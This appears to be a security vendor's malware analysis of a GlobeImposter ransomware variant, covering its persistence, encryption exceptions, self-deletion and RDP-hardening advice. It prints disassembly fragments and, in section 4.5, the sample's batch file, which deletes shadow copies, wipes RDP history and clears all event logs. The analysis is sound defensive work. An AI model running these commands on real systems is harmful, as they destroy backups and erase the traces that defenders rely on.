1     Sample Overview

Recently, researchers from Huawei Weiran Labs have captured a new ransomware sample. After analysis, it is found that the behavior of the sample is almost identical to that of the ransomware family GlobeImposter’s samples. A comparison of the sample’s code with code of GlobeImposter family 2018 samples shows a code similarity of above 80%. The sample compilation timestamp is February 2, 2019, from which it can be determined that the sample is the latest variant of the GlobeImposter family.

The GlobeImposter ransomware family was first discovered in May 2017, after which several large-scale outbreaks were discovered. Some extensions of files encrypted by earlier versions of the family include .CHAK, .crypted!, .dream, .TRUE, .doc, .Tiger4444, Ox4444. The family uses RSA+AES encryption to encrypt files. No organization has yet announced an effective decryption tool against the family.

After the sample runs, it copies itself to the system directory and creates a startup item. It then traverse the device drives, and encrypt files for ransom. A suffix of .CASE is used for encrypted files. A ransoming prompt text file named as how_to_back_files.html is released in the folder of each encrypted file. After the encryption is completed, a batch processing file will be released, records of login to remote devices from local device will be cleared, and local logs will be deleted. After the execution is completed, the sample will delete itself.

After the ransomware encrypts files, a ransom message will be displayed without the cost of restoring files, but it provides E-mail addresses for victim to consult the price of file recovery. The content of the ransoming prompt text file how_to_back_files.html is as follows:

The diagnosis result of the sample from HUAWEI sandbox product is as follows:

2      IOC

3      Sample Collection

We first analyzed the processes of infected device, and no suspicious process was found. After restarting the device, it is found that the temporarily created file is encrypted, and a process named svchost.exe under non-system directory is found. We didn’t find the suspicious file in the process’s image file directory. The newly created file will not be encrypted after rebooting again.

After analyzing the startup items of another infected device that has not been restarted, it is found that there is a suspicious key value in the Runonce startup item. The image path of the key value is identical to that of the suspicious process found in the first infected device. After the sample is collected into the experimental environment, it is confirmed by analysis that the sample is the ransomware sample.

4      Sample Analysis

The sample has a simple functionality and clear attack flow. The main execution flow diagram is as follows:

4.1      Environment Initialization

After the malicious code is executed, the key for encrypting files is generated and the data to be used in the encryption process is decrypted. The decrypted data includes the suffix name for encrypted files, a white list of unencrypted files, and the name of the ransoming prompt text file, etc. There are a total of 43 whitelisted names of files that are not encrypted by the sample, the list is as follows:

Windows、Microsoft、Microsoft Help、Windows App Certification Kit、Windows Defender、ESET、COMODO、Windows NT、Windows Kits、Windows Mail、
Windows Media Player、Windows Multimedia Platform、Windows Phone Kits、Windows Phone Silverlight Kits、Windows Photo Viewer、
Windows Portable Devices、Windows Sidebar、WindowsPowerShell、NVIDIA Corporation、Microsoft.NET、Internet Explorer、Kaspersky Lab、
McAfee、Avira spytech software、sysconfig、Avast、Dr.Web、Symantec、Symantec_Client_Security、system volume information、AVG、
Microsoft Shared、Common Files、Outlook Express、Movie Maker、Chrome、Mozilla、Firefox、Opera、YandexBrowser、ntldr、Wsus、ProgramData

After analyzing the white list, it is found that it contains names of Microsoft system software folders and names of some antivirus software folders, and also contains a Russian browser folder name, from which it is supposed that the developer of the sample may be a hacker using Russian as the mainstream language.

The string decryption disassembly code is as follows:

.rdata:00409CED                 push    edi             ; hFile
.rdata:00409CEE                 push    20h             ; int
.rdata:00409CF0                 push    dword_40CA9C    ; int
.rdata:00409CF6                 mov     esi, offset suffix_str
.rdata:00409CFB                 push    30h             ; int
.rdata:00409CFD                 push    esi             ; int
.rdata:00409CFE                 call    decode_str
.rdata:00409D03                 push    edi             ; hFile
.rdata:00409D04                 push    20h             ; int
.rdata:00409D06                 push    dword_40CA9C    ; int
.rdata:00409D0C                 push    30h             ; int
.rdata:00409D0E                 push    offset report_name_str ; int
.rdata:00409D13                 call    decode_str
.rdata:00409D18                 push    edi             ; CodePage
.rdata:00409D19                 push    esi             ; lpMultiByteStr
.rdata:00409D1A                 call    sub_409408
.rdata:00409D1F                 push    290h            ; int
.rdata:00409D24                 push    dword_40CA9C    ; int
.rdata:00409D2A                 mov     dword_40CAA8, eax
.rdata:00409D2F                 push    offset dword_40CAAC ; int
.rdata:00409D34                 push    offset except_suffix_str ; lpString
.rdata:00409D39                 call    decode_except_str
.rdata:00409D3E                 push    110h            ; int
.rdata:00409D43                 push    dword_40CA9C    ; int
.rdata:00409D49                 mov     dword_40CAB0, eax
.rdata:00409D4E                 push    offset dword_40C648 ; int
.rdata:00409D53                 push    offset except_folder_str ; lpString
.rdata:00409D58                 call    decode_except_str

4.2      Copy itself and create a startup item

After the sample runs, it will copy itself to the system directory and create a startup item. Since the virus creates the startup item under the RunOnce key value, the sample is only executed after the restart. Since the sample has the function of deleting itself, the sample is deleted after the device is restarted. The information of the startup item created by the sample is as follows:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"BrowserUpdateCheck"="C:\\Users\\Administrator\\AppData\\Local\\svchost.exe"

    The disassembly code of “Copy file and create a startup item”

.rdata:00409DCA                 push    edi             ; bFailIfExists
.rdata:00409DCB                 push    esi             ; lpNewFileName
.rdata:00409DCC                 push    lpMem           ; lpExistingFileName
.rdata:00409DD2                 call    CopyFileW
.rdata:00409DD8                 test    eax, eax
.rdata:00409DDA                 jz      short loc_409DE2
.rdata:00409DDC
.rdata:00409DDC loc_409DDC:                             ; CODE XREF: sub_409C6B+15Dj
.rdata:00409DDC                 push    esi             ; lpString2
.rdata:00409DDD
.rdata:00409DDD loc_409DDD:                             ; CODE XREF: sub_409C6B+154j
.rdata:00409DDD                 call    create_reg_runonce

4.3      Create An Encryption Key Backup File

The ransomware creates a file of key data used in the encryption process in the system directory. The file is stored in the following location:

C:\Users\Public\2946ED3ED6B1BB3BBC379EFB70E753162A8C2483FA2271873F22EE6FAECE1AF1

The file content may be as follows:

8021F4619DEE61582FD12ACEA1CB4FB7F8BA1D82315758F1141F756269D85599414493C1539ED9FEDEAE53772DBEDF19697916535FE8CEBB525
E98ADEA50AF4AEFFC7641E723276EEB739F7894688343F595D563025F39F3B3DE6E927DE4B65E95A6F562D05F58A6584811612B208A5053304E
079A75841EEE6C9DE839186843
6F 23 EA E0 97 B4 4D EB 67 DE 34 33 7F F6 8A 67
47 85 C4 AF 22 9D 3A 81 A9 20 B2 10 A5 87 2F B0
D2 B5 AB 43 D0 AA 43 59 4C BE DE 23 38 89 53 66
E1 2C ED 87 4B 41 E3 F2 9A E9 9C 51 85 36 AB 91
4F BD 47 05 3C 2A D9 23 EB 4E BD B9 71 4C A7 6A
5B C5 72 CB AD 20 5D 5D 91 56 6E 20 C4 00 C7 1E
D8 81 2E 81 A1 4E 0B 4E 22 21 12 49 9B 6A A7 B8
D8 80 71 C2 3F 50 50 CE 43 DF 51 D6 83 94 A8 A7
03 B4 6B A9 5E BF 91 38 34 8A 5B 52 D7 19 E2 94
97 25 3B 88 9F F3 21 A6 38 21 CA 8B AD 25 CC 9C
8E 98 56 14 57 5F 95 42 CC 26 B3 61 8A 17 E8 E5
2D 96 81 72 D3 42 26 A9 1D 2B 05 7A 2D BF 8F C0
21 A8 10 EE B4 14 A6 82 5F A8 BE 23 13 BD 00 82
86 A9 AA 86 73 16 FD 20 F2 9A 42 77 DE E9 0C E0
14 BD 96 21 4F 49 A0 E5 B8 0D 00 D8 D3 DC 13 2A
79 2E D2 6A B8 37 4C B1 5A DD 7D EB 1F F6 AF AF

The disassembly code of “Create a key file”

.rdata:00409DF4                 push    esi             ; nSize
.rdata:00409DF5                 push    edi             ; lpBuffer
.rdata:00409DF6                 push    offset aPublic  ; "public"
.rdata:00409DFB                 call    ebx ; GetEnvironmentVariableW
……
.rdata:00409E97                 push    ebx             ; lpFileName
.rdata:00409E98                 call    create_key_file

4.4      Traverse Drives and Encrypt Files

When the ransomware encrypts files of drives, it traverses the drive type and encrypts only the removable drive, the fixed drive, and the network drive. In addition, different from other ransomware programs that encrypt only files with specified suffix, the new variant encrypts all files on drives in the local device, but some files and folders are treated with exceptions. The exceptions are as follows:

Exception 1: The ransoming prompt text file named as how_to_back_files.html is not encrypted.

Exception 2: The key file saved by the virus is not encrypted, the file name is:

2946ED3ED6B1BB3BBC379EFB70E753162A8C2483FA2271873F22EE6FAECE1AF1

Exception 3: The currently launched ransomware file is not encrypted.

Exception 4: A file whose last five bytes are .CASE is not encrypted.

Exception 5: 43 whitelisted directories are not encrypted.

Exception 6: Files with a file size of 0 are not encrypted.

The disassembly code of “traverse system drives” is as follows:

.rdata:004099FD                 push    eax             ; lpRootPathName
.rdata:004099FE                 call    GetDriveTypeA
.rdata:00409A04                 cmp     eax, 3
.rdata:00409A07                 jz      short loc_409A13
.rdata:00409A09                 cmp     eax, 2
.rdata:00409A0C                 jz      short loc_409A13
.rdata:00409A0E                 cmp     eax, 4
.rdata:00409A11                 jnz     short loc_409A3C

The drive types are defined as below:

The disassembly code of “filename exceptions of exception 1 - exception 3 ”

.rdata:0040987C                 lea     eax, [esp+25B4h+FindFileData.cFileName]
.rdata:00409880                 push    eax             ; lpString1
.rdata:00409881                 call    esi ; lstrcmpiW
.rdata:00409883                 test    eax, eax
.rdata:00409885                 jz      loc_409942
.rdata:0040988B                 push    lpString2       ; lpString2
.rdata:00409891                 lea     eax, [esp+25B4h+FindFileData.cFileName]
.rdata:00409895                 push    eax             ; lpString1
.rdata:00409896                 call    esi ; lstrcmpiW
.rdata:00409898                 test    eax, eax
.rdata:0040989A                 jz      loc_409942
.rdata:004098A0                 push    lpMem           ; pszPath
.rdata:004098A6                 call    PathFindFileNameW
.rdata:004098AC                 push    eax             ; lpString2
.rdata:004098AD                 lea     eax, [esp+25B4h+FindFileData.cFileName]
.rdata:004098B1                 push    eax             ; lpString1
.rdata:004098B2                 call    esi ; lstrcmpiW

The disassembly code of “suffix name and whitelist exceptions of exception 4 - exception 5”

.rdata:00409284 loop_match:                             ; CODE XREF: sub_40923F+8Dj
.rdata:00409284                 push    [esp+14h+lpString] ; lpString
.rdata:00409288                 call    lstrlenA
.rdata:0040928E                 push    dword ptr [edi+ebx*4] ; lpString
.rdata:00409291                 mov     esi, eax
.rdata:00409293                 call    lstrlenA
.rdata:00409299                 cmp     esi, eax
.rdata:0040929B                 jl      short loc_4092C9
.rdata:0040929D                 mov     esi, [edi+ebx*4]
.rdata:004092A0                 push    esi             ; lpString
.rdata:004092A1                 call    lstrlenA
.rdata:004092A7                 mov     edi, [esp+14h+lpString]
.rdata:004092AB                 push    esi             ; lpString2
.rdata:004092AC                 push    [esp+18h+lpString] ; lpString
.rdata:004092B0                 sub     edi, eax
.rdata:004092B2                 call    lstrlenA
.rdata:004092B8                 add     eax, edi
.rdata:004092BA                 push    eax             ; lpString1
.rdata:004092BB                 call    lstrcmpiA
.rdata:004092C1                 test    eax, eax
.rdata:004092C3                 jz      short match_white_list
.rdata:004092C5                 mov     edi, [esp+14h+var_4]
.rdata:004092C9
.rdata:004092C9 loc_4092C9:                             ; CODE XREF: sub_40923F+5Cj
.rdata:004092C9                 inc     ebx
.rdata:004092CA                 cmp     ebx, ebp
.rdata:004092CC                 jb      short loop_match

The disassembly code of “empty file exception of exception 6”

.rdata:00408DDD                 push    ebx             ; hTemplateFile
.rdata:00408DDE                 push    80000000h       ; dwFlagsAndAttributes
.rdata:00408DE3                 push    3               ; dwCreationDisposition
.rdata:00408DE5                 push    ebx             ; lpSecurityAttributes
.rdata:00408DE6                 push    ebx             ; dwShareMode
.rdata:00408DE7                 push    0C0000000h      ; dwDesiredAccess
.rdata:00408DEC                 push    [esp+1B8h+lpFileName] ; lpFileName
.rdata:00408DF3                 call    CreateFileW
.rdata:00408DF9                 mov     ebx, eax
.rdata:00408DFB                 cmp     ebx, 0FFFFFFFFh
.rdata:00408DFE                 jz      next_loop
.rdata:00408E04                 lea     eax, [esp+1A0h+var_184]
.rdata:00408E08                 push    eax
.rdata:00408E09                 push    ebx
.rdata:00408E0A                 call    GetFileSizeEx
.rdata:00408E10                 test    eax, eax
.rdata:00408E12                 jz      next_loop
.rdata:00408E18                 mov     eax, dword ptr [esp+1A0h+var_184]
.rdata:00408E1C                 or      eax, dword ptr [esp+1A0h+var_184+4]
.rdata:00408E20                 jz      next_loop

4.5     Delete Data Backup and Remove Attack Traces

After the ransomware traverses all drives and encrypts files, it will release a batch processing file in the temporary directory, the file will delete the shadow copy, clear the records of login to remote devices from local device, and clear the device log.

The content of batch processing file is as follows:

@echo off
vssadmin.exe Delete Shadows /All /Quiet
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
cd %userprofile%\documents\
attrib Default.rdp -s -h
del Default.rdp
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"

In the batch processing file, the second line is used to delete the shadow copy, the third line to the eighth line is used to clear the records of login to remote devices from local device, and the last line is used to clean up all local logs.

The disassembly code of “create and execute the batch processing file” is as follows:

.rdata:00409463                 push    esi             ; lpBuffer
.rdata:00409464                 push    800h            ; nBufferLength
.rdata:00409469                 call    GetTempPathW
.rdata:0040946F                 push    edi             ; lpTempFileName
.rdata:00409470                 xor     ebx, ebx
.rdata:00409472                 push    ebx             ; uUnique
.rdata:00409473                 push    offset PrefixString ; "tmp"
.rdata:00409478                 push    esi             ; lpPathName
.rdata:00409479                 call    GetTempFileNameW
.rdata:0040947F                 push    offset String2  ; ".bat"
.rdata:00409484                 push    edi             ; lpString1
.rdata:00409485                 call    lstrcatW
.rdata:0040948B                 push    ebx             ; hTemplateFile
.rdata:0040948C                 push    80h             ; dwFlagsAndAttributes
.rdata:00409491                 push    2               ; dwCreationDisposition
.rdata:00409493                 push    ebx             ; lpSecurityAttributes
.rdata:00409494                 push    ebx             ; dwShareMode
.rdata:00409495                 push    40000000h       ; dwDesiredAccess
.rdata:0040949A                 push    edi             ; lpFileName
.rdata:0040949B                 call    CreateFileW
.rdata:004094A1                 cmp     eax, 0FFFFFFFFh
.rdata:004094A4                 jz      short loc_4094C3
.rdata:004094A6                 push    eax             ; hFile
.rdata:004094A7                 push    20h             ; int
.rdata:004094A9                 push    offset byte_401124 ; int
.rdata:004094AE                 push    1D0h            ; int
.rdata:004094B3                 push    offset dword_401358 ; int
.rdata:004094B8                 call    decode_str
.rdata:004094BD                 push    edi             ; lpCommandLine
.rdata:004094BE                 call    run_bat

4.6      Self-delete

Before the ransomware program exits, it deletes itself through batch processing command.

The disassembly code of “creates the self-delete command to delete itself” is as follows:

.rdata:0040957B                 push    offset aCDel    ; "/c del "
.rdata:00409580                 push    eax             ; lpString1
.rdata:00409581                 call    esi ; lstrcatW
.rdata:00409583                 lea     eax, [ebp+Filename]
.rdata:00409589                 push    eax             ; lpString2
.rdata:0040958A                 lea     eax, [ebp+String1]
.rdata:00409590                 push    eax             ; lpString1
.rdata:00409591                 call    esi ; lstrcatW
.rdata:00409593                 push    offset aNul     ; " > nul"
.rdata:00409598                 lea     eax, [ebp+String1]
.rdata:0040959E                 push    eax             ; lpString1
.rdata:0040959F                 call    esi ; lstrcatW
.rdata:004095A1                 lea     eax, [ebp+Buffer]
.rdata:004095A7                 mov     [ebp+ExecInfo.cbSize], 3Ch
.rdata:004095AE                 mov     [ebp+ExecInfo.lpFile], eax
.rdata:004095B1                 lea     eax, [ebp+String1]
.rdata:004095B7                 push    40h
.rdata:004095B9                 mov     [ebp+ExecInfo.lpParameters], eax
.rdata:004095BC                 lea     eax, [ebp+ExecInfo]
.rdata:004095BF                 pop     esi
.rdata:004095C0                 push    eax             ; lpExecInfo
.rdata:004095C1                 mov     [ebp+ExecInfo.hwnd], edi
.rdata:004095C4                 mov     [ebp+ExecInfo.lpVerb], offset aOpen ; "Open"
.rdata:004095CB                 mov     [ebp+ExecInfo.lpDirectory], edi
.rdata:004095CE                 mov     [ebp+ExecInfo.nShow], edi
.rdata:004095D1                 mov     [ebp+ExecInfo.fMask], esi
.rdata:004095D4                 call    ShellExecuteExW

5      Sum-up

The sample has a simple functionality and clear purpose. In addition to encrypting the data of the infected device, it cleans up remote login traces of the device and log records. The sample has self-delete function and creates a runonce startup item, so it will be completely deleted after the infected device is restarted, which means, after the infected device is restarted for the second time, the data in the infected device will not be encrypted.

6      Security Recommendations

After analysis, it is found that the sample is a member of GlobeImposter family compiled in February 2019. So far, many cases of the ransomware infection have been found, and an outbreak of the ransomware attack is expected, so the security personnel should take appropriate security measures to protect their key devices. Since the GlobeImposter family implements implantation mainly by cracking remote login password through brute force, you can effectively reduce the possibility of being attacked by setting a high complexity remote desktop login password, using different login passwords for different devices on the intranet, limiting the IP address of the remote login device, turning off unnecessary remote login service.

If you need to collect the virus sample after being infected, do not restart or shut down the device, otherwise the virus sample will delete itself.